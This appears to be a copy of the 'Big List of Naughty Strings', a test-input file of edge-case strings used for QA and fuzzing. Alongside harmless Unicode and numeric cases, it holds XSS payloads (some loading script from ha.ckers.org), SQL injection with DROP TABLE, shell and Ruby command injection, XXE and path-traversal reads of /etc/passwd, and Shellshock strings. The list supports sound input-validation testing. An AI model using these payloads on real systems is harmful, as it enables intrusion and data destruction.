1. #       Reserved Strings
2. #
3. #       Strings which may be used elsewhere in code
4.  
5. undefined
6. undef
7. null
8. NULL
9. (null)
10. nil
11. NIL
12. true
13. false
14. True
15. False
16. None
17. \
18. \\
19.  
20. #       Numeric Strings
21. #
22. #       Strings which can be interpreted as numeric
23.  
24. 0
25. 1
26. 1.00
27. $1.00
28. 1/2
29. 1E2
30. 1E02
31. 1E+02
32. -1
33. -1.00
34. -$1.00
35. -1/2
36. -1E2
37. -1E02
38. -1E+02
39. 1/0
40. 0/0
41. -2147483648/-1
42. -9223372036854775808/-1
43. 0.00
44. 0..0
45. .
46. 0.0.0
47. 0,00
48. 0,,0
49. ,
50. 0,0,0
51. 0.0/0
52. 1.0/0.0
53. 0.0/0.0
54. 1,0/0,0
55. 0,0/0,0
56. --1
57. -
58. -.
59. -,
60. 999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
61. NaN
62. Infinity
63. -Infinity
64. 0x0
65. 0xffffffff
66. 0xffffffffffffffff
67. 0xabad1dea
68. 123456789012345678901234567890123456789
69. 1,000.00
70. 1 000.00
71. 1'000.00
72. 1,000,000.00
73. 1 000 000.00
74. 1'000'000.00
75. 1.000,00
76. 1 000,00
77. 1'000,00
78. 1.000.000,00
79. 1 000 000,00
80. 1'000'000,00
81. 01000
82. 08
83. 09
84. 2.2250738585072011e-308
85.  
86. #       Special Characters
87. #
88. #       Strings which contain common special ASCII characters (may need to be escaped)
89.  
90. ,./;'[]\-=
91. <>?:"{}|_+
92. !@#$%^&*()`~
93.  
94. #       Unicode Symbols
95. #
96. #       Strings which contain common unicode symbols (e.g. smart quotes)
97.  
98. Ω≈ç√∫˜µ≤≥÷
99. åß∂ƒ©˙∆˚¬…æ
100. œ∑´®†¥¨ˆøπ“‘
101. ¡™£¢∞§¶•ªº–≠
102. ¸˛Ç◊ı˜Â¯˘¿
103. ÅÍÎÏ˝ÓÔÒÚÆ☃
104. Œ„´‰ˇÁ¨ˆØ∏”’
105. `⁄€‹›fifl‡°·‚—±
106. ⅛⅜⅝⅞
107. ЁЂЃЄЅІЇЈЉЊЋЌЍЎЏАБВГДЕЖЗИЙКЛМНОПРСТУФХЦЧШЩЪЫЬЭЮЯабвгдежзийклмнопрстуфхцчшщъыьэюя
108. ٠١٢٣٤٥٦٧٨٩
109.  
110. #       Unicode Subscript/Superscript
111. #
112. #       Strings which contain unicode subscripts/superscripts; can cause rendering issues
113.  
114. ⁰⁴⁵
115. ₀₁₂
116. ⁰⁴⁵₀₁₂
117.  
118. #       Quotation Marks
119. #
120. #       Strings which contain misplaced quotation marks; can cause encoding errors
121.  
122. '
123. "
124. ''
125. ""
126. '"'
127. "''''"'"
128. "'"'"''''"
129.  
130. #       Two-Byte Characters
131. #
132. #       Strings which contain two-byte characters: can cause rendering issues or character-length issues
133.  
134. 田中さんにあげて下さい
135. パーティーへ行かないか
136. 和製漢語
137. 部落格
138. 사회과학원 어학연구소
139. 찦차를 타고 온 펲시맨과 쑛다리 똠방각하
140. 社會科學院語學研究所
141. 울란바토르
142. ???????
143.  
144. #       Japanese Emoticons
145. #
146. #       Strings which consists of Japanese-style emoticons which are popular on the web
147.  
148. ヽ༼ຈل͜ຈ༽ﾉ ヽ༼ຈل͜ຈ༽ﾉ
149. (｡◕ ∀ ◕｡)
150. ｀ｨ(´∀｀∩
151. __ﾛ(,_,*)
152. ・(￣∀￣)・:*:
153. ﾟ･✿ヾ╲(｡◕‿◕｡)╱✿･ﾟ
154. ,。・:*:・゜’( ☻ ω ☻ )。・:*:・゜’
155. (╯°□°）╯︵ ┻━┻)  
156. (ﾉಥ益ಥ）ﾉ ┻━┻
157. ( ͡° ͜ʖ ͡°)
158.  
159. #       Emoji
160. #
161. #       Strings which contain Emoji; should be the same behavior as two-byte characters, but not always
162.  
163. ?
164. ??
165. ? ? ? ? ? ? ? ?
166. ? ? ? ?
167. ❤️ ? ? ? ? ? ? ? ? ? ? ? ? ? ?
168. ✋? ?? ?? ?? ?? ??
169. ? ? ? ? ? ? ? ?
170. 0️⃣ 1️⃣ 2️⃣ 3️⃣ 4️⃣ 5️⃣ 6️⃣ 7️⃣ 8️⃣ 9️⃣ ?
171.  
172. #       Unicode Numbers
173. #
174. #       Strings which contain unicode numbers; if the code is localized, it should see the input as numeric
175.  
176. １２３
177. ١٢٣
178.  
179. #       Right-To-Left Strings
180. #
181. #       Strings which contain text that should be rendered RTL if possible (e.g. Arabic, Hebrew)
182.  
183. ثم نفس سقطت وبالتحديد،, جزيرتي باستخدام أن دنو. إذ هنا؟ الستار وتنصيب كان. أهّل ايطاليا، بريطانيا-فرنسا قد أخذ. سليمان، إتفاقية بين ما, يذكر الحدود أي بعد, معاملة بولندا، الإطلاق عل إيو.
184. בְּרֵאשִׁית, בָּרָא אֱלֹהִים, אֵת הַשָּׁמַיִם, וְאֵת הָאָרֶץ
185. הָיְתָהtestالصفحات التّحول
186. ﷽
187. ﷺ
188.  
189. #       Unicode Spaces
190. #
191. #       Strings which contain unicode space characters with special properties (c.f. https://www.cs.tut.fi/~jkorpela/chars/spaces.html)
192.  
193. ​
194.  
195. ᠎
196. 　
197. 
198. ␣
199. ␢
200. ␡
201.  
202. #       Trick Unicode
203. #
204. #       Strings which contain unicode with unusual properties (e.g. Right-to-left override) (c.f. http://www.unicode.org/charts/PDF/U2000.pdf)
205.  
206. ‪‪test‪
207. ‫test‫
208. 
test

209. test⁠test‫
210. ⁦test⁧
211.  
212. #       Zalgo Text
213. #
214. #       Strings which contain "corrupted" text. The corruption will not appear in non-HTML text, however. (via http://www.eeemo.net)
215.  
216. Ṱ̺̺̕o͞ ̷i̲̬͇̪͙n̝̗͕v̟̜̘̦͟o̶̙̰̠kè͚̮̺̪̹̱̤ ̖t̝͕̳̣̻̪͞h̼͓̲̦̳̘̲e͇̣̰̦̬͎ ̢̼̻̱̘h͚͎͙̜̣̲ͅi̦̲̣̰̤v̻͍e̺̭̳̪̰-m̢iͅn̖̺̞̲̯̰d̵̼̟͙̩̼̘̳ ̞̥̱̳̭r̛̗̘e͙p͠r̼̞̻̭̗e̺̠̣͟s̘͇̳͍̝͉e͉̥̯̞̲͚̬͜ǹ̬͎͎̟̖͇̤t͍̬̤͓̼̭͘ͅi̪̱n͠g̴͉ ͏͉ͅc̬̟h͡a̫̻̯͘o̫̟̖͍̙̝͉s̗̦̲.̨̹͈̣
217. ̡͓̞ͅI̗̘̦͝n͇͇͙v̮̫ok̲̫̙͈i̖͙̭̹̠̞n̡̻̮̣̺g̲͈͙̭͙̬͎ ̰t͔̦h̞̲e̢̤ ͍̬̲͖f̴̘͕̣è͖ẹ̥̩l͖͔͚i͓͚̦͠n͖͍̗͓̳̮g͍ ̨o͚̪͡f̘̣̬ ̖̘͖̟͙̮c҉͔̫͖͓͇͖ͅh̵̤̣͚͔á̗̼͕ͅo̼̣̥s̱͈̺̖̦̻͢.̛̖̞̠̫̰
218. ̗̺͖̹̯͓Ṯ̤͍̥͇͈h̲́e͏͓̼̗̙̼̣͔ ͇̜̱̠͓͍ͅN͕͠e̗̱z̘̝̜̺͙p̤̺̹͍̯͚e̠̻̠͜r̨̤͍̺̖͔̖̖d̠̟̭̬̝͟i̦͖̩͓͔̤a̠̗̬͉̙n͚͜ ̻̞̰͚ͅh̵͉i̳̞v̢͇ḙ͎͟-҉̭̩̼͔m̤̭̫i͕͇̝̦n̗͙ḍ̟ ̯̲͕͞ǫ̟̯̰̲͙̻̝f ̪̰̰̗̖̭̘͘c̦͍̲̞͍̩̙ḥ͚a̮͎̟̙͜ơ̩̹͎s̤.̝̝ ҉Z̡̖̜͖̰̣͉̜a͖̰͙̬͡l̲̫̳͍̩g̡̟̼̱͚̞̬ͅo̗͜.̟
219. ̦H̬̤̗̤͝e͜ ̜̥̝̻͍̟́w̕h̖̯͓o̝͙̖͎̱̮ ҉̺̙̞̟͈W̷̼̭a̺̪͍į͈͕̭͙̯̜t̶̼̮s̘͙͖̕ ̠̫̠B̻͍͙͉̳ͅe̵h̵̬͇̫͙i̹͓̳̳̮͎̫̕n͟d̴̪̜̖ ̰͉̩͇͙̲͞ͅT͖̼͓̪͢h͏͓̮̻e̬̝̟ͅ ̤̹̝W͙̞̝͔͇͝ͅa͏͓͔̹̼̣l̴͔̰̤̟͔ḽ̫.͕
220. Z̮̞̠͙͔ͅḀ̗̞͈̻̗Ḷ͙͎̯̹̞͓G̻O̭̗̮
221.  
222. #       Unicode Upsidedown
223. #
224. #       Strings which contain unicode with an "upsidedown" effect (via http://www.upsidedowntext.com)
225.  
226. ˙ɐnbᴉlɐ ɐuƃɐɯ ǝɹolop ʇǝ ǝɹoqɐl ʇn ʇunpᴉpᴉɔuᴉ ɹodɯǝʇ poɯsnᴉǝ op pǝs 'ʇᴉlǝ ƃuᴉɔsᴉdᴉpɐ ɹnʇǝʇɔǝsuoɔ 'ʇǝɯɐ ʇᴉs ɹolop ɯnsdᴉ ɯǝɹo˥
227. 00˙Ɩ$-
228.  
229. #       Unicode font
230. #
231. #       Strings which contain bold/italic/etc. versions of normal characters
232.  
233. Ｔｈｅ ｑｕｉｃｋ ｂｒｏｗｎ ｆｏｘ ｊｕｍｐｓ ｏｖｅｒ ｔｈｅ ｌａｚｙ ｄｏｇ
234. ??? ????? ????? ??? ????? ???? ??? ???? ???
235. ??? ????? ????? ??? ????? ???? ??? ???? ???
236. ??? ????? ????? ??? ????? ???? ??? ???? ???
237. ??? ????? ????? ??? ????? ???? ??? ???? ???
238. ??? ????? ????? ??? ????? ???? ??? ???? ???
239. ??? ????? ????? ??? ????? ???? ??? ???? ???
240. ⒯⒣⒠ ⒬⒰⒤⒞⒦ ⒝⒭⒪⒲⒩ ⒡⒪⒳ ⒥⒰⒨⒫⒮ ⒪⒱⒠⒭ ⒯⒣⒠ ⒧⒜⒵⒴ ⒟⒪⒢
241.  
242. #       Script Injection
243. #
244. #       Strings which attempt to invoke a benign script injection; shows vulnerability to XSS
245.  
246. <script>alert(123)</script>
247. &lt;script&gt;alert(&#39;123&#39;);&lt;/script&gt;
248. <img src=x onerror=alert(123) />
249. <svg><script>123<1>alert(123)</script>
250. "><script>alert(123)</script>
251. '><script>alert(123)</script>
252. ><script>alert(123)</script>
253. </script><script>alert(123)</script>
254. < / script >< script >alert(123)< / script >
255.  onfocus=JaVaSCript:alert(123) autofocus
256. " onfocus=JaVaSCript:alert(123) autofocus
257. ' onfocus=JaVaSCript:alert(123) autofocus
258. ＜script＞alert(123)＜/script＞
259. <sc<script>ript>alert(123)</sc</script>ript>
260. --><script>alert(123)</script>
261. ";alert(123);t="
262. ';alert(123);t='
263. JavaSCript:alert(123)
264. ;alert(123);
265. src=JaVaSCript:prompt(132)
266. "><script>alert(123);</script x="
267. '><script>alert(123);</script x='
268. ><script>alert(123);</script x=
269. " autofocus onkeyup="javascript:alert(123)
270. ' autofocus onkeyup='javascript:alert(123)
271. <script\x20type="text/javascript">javascript:alert(1);</script>
272. <script\x3Etype="text/javascript">javascript:alert(1);</script>
273. <script\x0Dtype="text/javascript">javascript:alert(1);</script>
274. <script\x09type="text/javascript">javascript:alert(1);</script>
275. <script\x0Ctype="text/javascript">javascript:alert(1);</script>
276. <script\x2Ftype="text/javascript">javascript:alert(1);</script>
277. <script\x0Atype="text/javascript">javascript:alert(1);</script>
278. '`"><\x3Cscript>javascript:alert(1)</script>        
279. '`"><\x00script>javascript:alert(1)</script>
280. ABC<div style="x\x3Aexpression(javascript:alert(1)">DEF
281. ABC<div style="x:expression\x5C(javascript:alert(1)">DEF
282. ABC<div style="x:expression\x00(javascript:alert(1)">DEF
283. ABC<div style="x:exp\x00ression(javascript:alert(1)">DEF
284. ABC<div style="x:exp\x5Cression(javascript:alert(1)">DEF
285. ABC<div style="x:\x0Aexpression(javascript:alert(1)">DEF
286. ABC<div style="x:\x09expression(javascript:alert(1)">DEF
287. ABC<div style="x:\xE3\x80\x80expression(javascript:alert(1)">DEF
288. ABC<div style="x:\xE2\x80\x84expression(javascript:alert(1)">DEF
289. ABC<div style="x:\xC2\xA0expression(javascript:alert(1)">DEF
290. ABC<div style="x:\xE2\x80\x80expression(javascript:alert(1)">DEF
291. ABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert(1)">DEF
292. ABC<div style="x:\x0Dexpression(javascript:alert(1)">DEF
293. ABC<div style="x:\x0Cexpression(javascript:alert(1)">DEF
294. ABC<div style="x:\xE2\x80\x87expression(javascript:alert(1)">DEF
295. ABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert(1)">DEF
296. ABC<div style="x:\x20expression(javascript:alert(1)">DEF
297. ABC<div style="x:\xE2\x80\x88expression(javascript:alert(1)">DEF
298. ABC<div style="x:\x00expression(javascript:alert(1)">DEF
299. ABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert(1)">DEF
300. ABC<div style="x:\xE2\x80\x86expression(javascript:alert(1)">DEF
301. ABC<div style="x:\xE2\x80\x85expression(javascript:alert(1)">DEF
302. ABC<div style="x:\xE2\x80\x82expression(javascript:alert(1)">DEF
303. ABC<div style="x:\x0Bexpression(javascript:alert(1)">DEF
304. ABC<div style="x:\xE2\x80\x81expression(javascript:alert(1)">DEF
305. ABC<div style="x:\xE2\x80\x83expression(javascript:alert(1)">DEF
306. ABC<div style="x:\xE2\x80\x89expression(javascript:alert(1)">DEF
307. <a href="\x0Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
308. <a href="\x0Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
309. <a href="\xC2\xA0javascript:javascript:alert(1)" id="fuzzelement1">test</a>
310. <a href="\x05javascript:javascript:alert(1)" id="fuzzelement1">test</a>
311. <a href="\xE1\xA0\x8Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>
312. <a href="\x18javascript:javascript:alert(1)" id="fuzzelement1">test</a>
313. <a href="\x11javascript:javascript:alert(1)" id="fuzzelement1">test</a>
314. <a href="\xE2\x80\x88javascript:javascript:alert(1)" id="fuzzelement1">test</a>
315. <a href="\xE2\x80\x89javascript:javascript:alert(1)" id="fuzzelement1">test</a>
316. <a href="\xE2\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>
317. <a href="\x17javascript:javascript:alert(1)" id="fuzzelement1">test</a>
318. <a href="\x03javascript:javascript:alert(1)" id="fuzzelement1">test</a>
319. <a href="\x0Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>
320. <a href="\x1Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>
321. <a href="\x00javascript:javascript:alert(1)" id="fuzzelement1">test</a>
322. <a href="\x10javascript:javascript:alert(1)" id="fuzzelement1">test</a>
323. <a href="\xE2\x80\x82javascript:javascript:alert(1)" id="fuzzelement1">test</a>
324. <a href="\x20javascript:javascript:alert(1)" id="fuzzelement1">test</a>
325. <a href="\x13javascript:javascript:alert(1)" id="fuzzelement1">test</a>
326. <a href="\x09javascript:javascript:alert(1)" id="fuzzelement1">test</a>
327. <a href="\xE2\x80\x8Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>
328. <a href="\x14javascript:javascript:alert(1)" id="fuzzelement1">test</a>
329. <a href="\x19javascript:javascript:alert(1)" id="fuzzelement1">test</a>
330. <a href="\xE2\x80\xAFjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
331. <a href="\x1Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
332. <a href="\xE2\x80\x81javascript:javascript:alert(1)" id="fuzzelement1">test</a>
333. <a href="\x1Djavascript:javascript:alert(1)" id="fuzzelement1">test</a>
334. <a href="\xE2\x80\x87javascript:javascript:alert(1)" id="fuzzelement1">test</a>
335. <a href="\x07javascript:javascript:alert(1)" id="fuzzelement1">test</a>
336. <a href="\xE1\x9A\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>
337. <a href="\xE2\x80\x83javascript:javascript:alert(1)" id="fuzzelement1">test</a>
338. <a href="\x04javascript:javascript:alert(1)" id="fuzzelement1">test</a>
339. <a href="\x01javascript:javascript:alert(1)" id="fuzzelement1">test</a>
340. <a href="\x08javascript:javascript:alert(1)" id="fuzzelement1">test</a>
341. <a href="\xE2\x80\x84javascript:javascript:alert(1)" id="fuzzelement1">test</a>
342. <a href="\xE2\x80\x86javascript:javascript:alert(1)" id="fuzzelement1">test</a>
343. <a href="\xE3\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>
344. <a href="\x12javascript:javascript:alert(1)" id="fuzzelement1">test</a>
345. <a href="\x0Djavascript:javascript:alert(1)" id="fuzzelement1">test</a>
346. <a href="\x0Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>
347. <a href="\x0Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
348. <a href="\x15javascript:javascript:alert(1)" id="fuzzelement1">test</a>
349. <a href="\xE2\x80\xA8javascript:javascript:alert(1)" id="fuzzelement1">test</a>
350. <a href="\x16javascript:javascript:alert(1)" id="fuzzelement1">test</a>
351. <a href="\x02javascript:javascript:alert(1)" id="fuzzelement1">test</a>
352. <a href="\x1Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
353. <a href="\x06javascript:javascript:alert(1)" id="fuzzelement1">test</a>
354. <a href="\xE2\x80\xA9javascript:javascript:alert(1)" id="fuzzelement1">test</a>
355. <a href="\xE2\x80\x85javascript:javascript:alert(1)" id="fuzzelement1">test</a>
356. <a href="\x1Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>
357. <a href="\xE2\x81\x9Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
358. <a href="\x1Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
359. <a href="javascript\x00:javascript:alert(1)" id="fuzzelement1">test</a>
360. <a href="javascript\x3A:javascript:alert(1)" id="fuzzelement1">test</a>
361. <a href="javascript\x09:javascript:alert(1)" id="fuzzelement1">test</a>
362. <a href="javascript\x0D:javascript:alert(1)" id="fuzzelement1">test</a>
363. <a href="javascript\x0A:javascript:alert(1)" id="fuzzelement1">test</a>
364. `"'><img src=xxx:x \x0Aonerror=javascript:alert(1)>
365. `"'><img src=xxx:x \x22onerror=javascript:alert(1)>
366. `"'><img src=xxx:x \x0Bonerror=javascript:alert(1)>
367. `"'><img src=xxx:x \x0Donerror=javascript:alert(1)>
368. `"'><img src=xxx:x \x2Fonerror=javascript:alert(1)>
369. `"'><img src=xxx:x \x09onerror=javascript:alert(1)>
370. `"'><img src=xxx:x \x0Conerror=javascript:alert(1)>
371. `"'><img src=xxx:x \x00onerror=javascript:alert(1)>
372. `"'><img src=xxx:x \x27onerror=javascript:alert(1)>
373. `"'><img src=xxx:x \x20onerror=javascript:alert(1)>
374. "`'><script>\x3Bjavascript:alert(1)</script>
375. "`'><script>\x0Djavascript:alert(1)</script>
376. "`'><script>\xEF\xBB\xBFjavascript:alert(1)</script>
377. "`'><script>\xE2\x80\x81javascript:alert(1)</script>
378. "`'><script>\xE2\x80\x84javascript:alert(1)</script>
379. "`'><script>\xE3\x80\x80javascript:alert(1)</script>
380. "`'><script>\x09javascript:alert(1)</script>
381. "`'><script>\xE2\x80\x89javascript:alert(1)</script>
382. "`'><script>\xE2\x80\x85javascript:alert(1)</script>
383. "`'><script>\xE2\x80\x88javascript:alert(1)</script>
384. "`'><script>\x00javascript:alert(1)</script>
385. "`'><script>\xE2\x80\xA8javascript:alert(1)</script>
386. "`'><script>\xE2\x80\x8Ajavascript:alert(1)</script>
387. "`'><script>\xE1\x9A\x80javascript:alert(1)</script>
388. "`'><script>\x0Cjavascript:alert(1)</script>
389. "`'><script>\x2Bjavascript:alert(1)</script>
390. "`'><script>\xF0\x90\x96\x9Ajavascript:alert(1)</script>
391. "`'><script>-javascript:alert(1)</script>
392. "`'><script>\x0Ajavascript:alert(1)</script>
393. "`'><script>\xE2\x80\xAFjavascript:alert(1)</script>
394. "`'><script>\x7Ejavascript:alert(1)</script>
395. "`'><script>\xE2\x80\x87javascript:alert(1)</script>
396. "`'><script>\xE2\x81\x9Fjavascript:alert(1)</script>
397. "`'><script>\xE2\x80\xA9javascript:alert(1)</script>
398. "`'><script>\xC2\x85javascript:alert(1)</script>
399. "`'><script>\xEF\xBF\xAEjavascript:alert(1)</script>
400. "`'><script>\xE2\x80\x83javascript:alert(1)</script>
401. "`'><script>\xE2\x80\x8Bjavascript:alert(1)</script>
402. "`'><script>\xEF\xBF\xBEjavascript:alert(1)</script>
403. "`'><script>\xE2\x80\x80javascript:alert(1)</script>
404. "`'><script>\x21javascript:alert(1)</script>
405. "`'><script>\xE2\x80\x82javascript:alert(1)</script>
406. "`'><script>\xE2\x80\x86javascript:alert(1)</script>
407. "`'><script>\xE1\xA0\x8Ejavascript:alert(1)</script>
408. "`'><script>\x0Bjavascript:alert(1)</script>
409. "`'><script>\x20javascript:alert(1)</script>
410. "`'><script>\xC2\xA0javascript:alert(1)</script>
411. <img \x00src=x onerror="alert(1)">
412. <img \x47src=x onerror="javascript:alert(1)">
413. <img \x11src=x onerror="javascript:alert(1)">
414. <img \x12src=x onerror="javascript:alert(1)">
415. <img\x47src=x onerror="javascript:alert(1)">
416. <img\x10src=x onerror="javascript:alert(1)">
417. <img\x13src=x onerror="javascript:alert(1)">
418. <img\x32src=x onerror="javascript:alert(1)">
419. <img\x47src=x onerror="javascript:alert(1)">
420. <img\x11src=x onerror="javascript:alert(1)">
421. <img \x47src=x onerror="javascript:alert(1)">
422. <img \x34src=x onerror="javascript:alert(1)">
423. <img \x39src=x onerror="javascript:alert(1)">
424. <img \x00src=x onerror="javascript:alert(1)">
425. <img src\x09=x onerror="javascript:alert(1)">
426. <img src\x10=x onerror="javascript:alert(1)">
427. <img src\x13=x onerror="javascript:alert(1)">
428. <img src\x32=x onerror="javascript:alert(1)">
429. <img src\x12=x onerror="javascript:alert(1)">
430. <img src\x11=x onerror="javascript:alert(1)">
431. <img src\x00=x onerror="javascript:alert(1)">
432. <img src\x47=x onerror="javascript:alert(1)">
433. <img src=x\x09onerror="javascript:alert(1)">
434. <img src=x\x10onerror="javascript:alert(1)">
435. <img src=x\x11onerror="javascript:alert(1)">
436. <img src=x\x12onerror="javascript:alert(1)">
437. <img src=x\x13onerror="javascript:alert(1)">
438. <img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)">
439. <img src=x onerror=\x09"javascript:alert(1)">
440. <img src=x onerror=\x10"javascript:alert(1)">
441. <img src=x onerror=\x11"javascript:alert(1)">
442. <img src=x onerror=\x12"javascript:alert(1)">
443. <img src=x onerror=\x32"javascript:alert(1)">
444. <img src=x onerror=\x00"javascript:alert(1)">
445. <a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:alert(1)>XXX</a>
446. <img src="x` `<script>javascript:alert(1)</script>"` `>
447. <img src onerror /" '"= alt=javascript:alert(1)//">
448. <title onpropertychange=javascript:alert(1)></title><title title=>
449. <a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>">
450. <!--[if]><script>javascript:alert(1)</script -->
451. <!--[if<img src=x onerror=javascript:alert(1)//]> -->
452. <script src="/\%(jscript)s"></script>
453. <script src="\\%(jscript)s"></script>
454. <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
455. <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
456. <IMG SRC=# onmouseover="alert('xxs')">
457. <IMG SRC= onmouseover="alert('xxs')">
458. <IMG onmouseover="alert('xxs')">
459. <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
460. <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
461. <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
462. <IMG SRC="jav   ascript:alert('XSS');">
463. <IMG SRC="jav&#x09;ascript:alert('XSS');">
464. <IMG SRC="jav&#x0A;ascript:alert('XSS');">
465. <IMG SRC="jav&#x0D;ascript:alert('XSS');">
466. perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
467. <IMG SRC=" &#14;  javascript:alert('XSS');">
468. <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
469. <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
470. <SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
471. <<SCRIPT>alert("XSS");//<</SCRIPT>
472. <SCRIPT SRC=http://ha.ckers.org/xss.js?< B >
473. <SCRIPT SRC=//ha.ckers.org/.j>
474. <IMG SRC="javascript:alert('XSS')"
475. <iframe src=http://ha.ckers.org/scriptlet.html <
476. \";alert('XSS');//
477. <plaintext>
478.  
479. #       SQL Injection
480. #
481. #       Strings which can cause a SQL injection if inputs are not sanitized
482.  
483. 1;DROP TABLE users
484. 1'; DROP TABLE users-- 1
485. ' OR 1=1 -- 1
486. ' OR '1'='1
487.  
488. #       Server Code Injection
489. #
490. #       Strings which can cause user to run code on server as a privileged user (c.f. https://news.ycombinator.com/item?id=7665153)
491.  
492. -
493. --
494. --version
495. --help
496. $USER
497. /dev/null; touch /tmp/blns.fail ; echo
498. `touch /tmp/blns.fail`
499. $(touch /tmp/blns.fail)
500. @{[system "touch /tmp/blns.fail"]}
501.  
502. #       Command Injection (Ruby)
503. #
504. #       Strings which can call system commands within Ruby/Rails applications
505.  
506. eval("puts 'hello world'")
507. System("ls -al /")
508. `ls -al /`
509. Kernel.exec("ls -al /")
510. Kernel.exit(1)
511. %x('ls -al /')
512.  
513. #      XXE Injection (XML)
514. #
515. #       String which can reveal system files when parsed by a badly configured XML parser
516.  
517. <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>
518.  
519. #       Unwanted Interpolation
520. #
521. #       Strings which can be accidentally expanded into different strings if evaluated in the wrong context, e.g. used as a printf format string or via Perl or shell eval. Might expose sensitive data from the program doing the interpolation, or might just represent the wrong string.
522.  
523. $HOME
524. $ENV{'HOME'}
525. %d
526. %s
527. %*.*s
528.  
529. #       File Inclusion
530. #
531. #       Strings which can cause user to pull in files that should not be a part of a web server
532.  
533. ../../../../../../../../../../../etc/passwd%00
534. ../../../../../../../../../../../etc/hosts
535.  
536. #       Known CVEs and Vulnerabilities
537. #
538. #       Strings that test for known vulnerabilities
539.  
540. () { 0; }; touch /tmp/blns.shellshock1.fail;
541. () { _; } >_[$($())] { touch /tmp/blns.shellshock2.fail; }
542.  
543. #       MSDOS/Windows Special Filenames
544. #
545. #       Strings which are reserved characters in MSDOS/Windows
546.  
547. CON
548. PRN
549. AUX
550. CLOCK$
551. NUL
552. A:
553. ZZ:
554. COM1
555. LPT1
556. LPT2
557. LPT3
558. COM2
559. COM3
560. COM4
561.  
562. #       Scunthorpe Problem
563. #
564. #       Innocuous strings which may be blocked by profanity filters (https://en.wikipedia.org/wiki/Scunthorpe_problem)
565.  
566. Scunthorpe General Hospital
567. Penistone Community Church
568. Lightwater Country Park
569. Jimmy Clitheroe
570. Horniman Museum
571. shitake mushrooms
572. RomansInSussex.co.uk
573. http://www.cum.qc.ca/
574. Craig Cockburn, Software Specialist
575. Linda Callahan
576. Dr. Herman I. Libshitz
577. magna cum laude
578. Super Bowl XXX
579. medieval erection of parapets
580. evaluate
581. mocha
582. expression
583. Arsenal canal
584. classic
585. Tyson Gay
586.  
587. #       Human injection
588. #
589. #       Strings which may cause human to reinterpret worldview
590.  
591. If you're reading this, you've been in a coma for almost 20 years now. We're trying a new technique. We don't know where this message will end up in your dream, but we hope it works. Please wake up, we miss you.
592.  
593. #       Terminal escape codes
594. #
595. #       Strings which punish the fools who use cat/type on this file
596.  
597. Roses are red, violets are blue. Hope you enjoy terminal hue
598. But now...for my greatest trick...
599. The quick brown fox... [Beeeep]
600.  
601. #       iOS Vulnerability
602. #
603. #       Strings which crashed iMessage in iOS versions 8.3 and earlier
604.  
605. Powerلُلُصّبُلُلصّبُررً ॣ ॣh ॣ ॣ冗